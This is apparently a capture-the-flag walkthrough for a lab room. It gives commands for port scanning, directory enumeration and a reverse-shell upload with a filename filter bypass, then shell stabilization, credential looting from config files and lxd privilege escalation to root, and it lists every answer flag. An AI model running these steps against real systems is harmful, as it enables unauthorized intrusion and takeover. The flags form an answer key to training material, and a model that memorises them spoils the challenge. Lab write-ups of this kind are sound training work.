The Trial Before Christmas

Web

Video

Resources

Challenges

Scan the machine. What ports are open?

nmap -sC -sV -T5 -p1-65535 10.10.243.219

80, 65000

What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.

gobuster dir -u http://10.10.243.219 -w /usr/share/dirb/wordlists/common.txt

gobuster dir -u http://10.10.243.219:65000 -w /usr/share/dirb/wordlists/common.txt -x php -t 50

Light Cycle

What is the name of the hidden php page?

gobuster dir -u http://10.10.243.219:65000 -w /usr/share/dirb/wordlists/common.txt -x php -t 50

uploads.php

What is the name of the hidden directory where file uploads are saved?

grid

Bypass the filters. Upload and execute a reverse shell.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

mv php-reverse-shell.php image.jpeg.php

No answer needed

What is the value of the web.txt flag?

THM{ENTER_THE_GRID}

Upgrade and stabilize your shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z
stty raw -echo; fg

No answer needed

Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password

cd /var/www/
cd TheGrid
cd includes
cat dbauth.php

tron:IFightForTheUsers

Access the database and discover the encrypted credentials. What is the name of the database you find these in?

mysql -u tron -p
IFightForTheUsers
show databases;
use tron;

tron

Crack the password. What is it?

Hash Type Identifier - Identify unknown hashes

@computer@

No naswer needed

What is the value of the user.txt flag?

THM{IDENTITY_DISC_RECOGNISED}

Check the user's groups. Which group can be leveraged to escalate privileges?

id
group

lxd

Abuse this group to escalate privileges to root.

lxc image list
lxc init Alpine strongbad -c security.privileged=true
lxc config device add strongbad trogdor disk source=/ path=/mnt/root recursive=true
lxc start strongbad
lxc exec strongbad /bin/sh

No answer needed

What is the value of the root.txt flag?

THM{FLYNN_LIVES}

PreviousThe Grinch strikes again!NextThank You

Last updated 4 years ago

Was this helpful?

Video

Resources

Challenges

Scan the machine. What ports are open?

What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.

What is the name of the hidden php page?

What is the name of the hidden directory where file uploads are saved?

Bypass the filters. Upload and execute a reverse shell.

What is the value of the web.txt flag?

Upgrade and stabilize your shell.

Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password

Access the database and discover the encrypted credentials. What is the name of the database you find these in?

Crack the password. What is it?

Use su to login to the newly discovered user by exploiting password reuse.

What is the value of the user.txt flag?

Check the user's groups. Which group can be leveraged to escalate privileges?

Abuse this group to escalate privileges to root.

What is the value of the root.txt flag?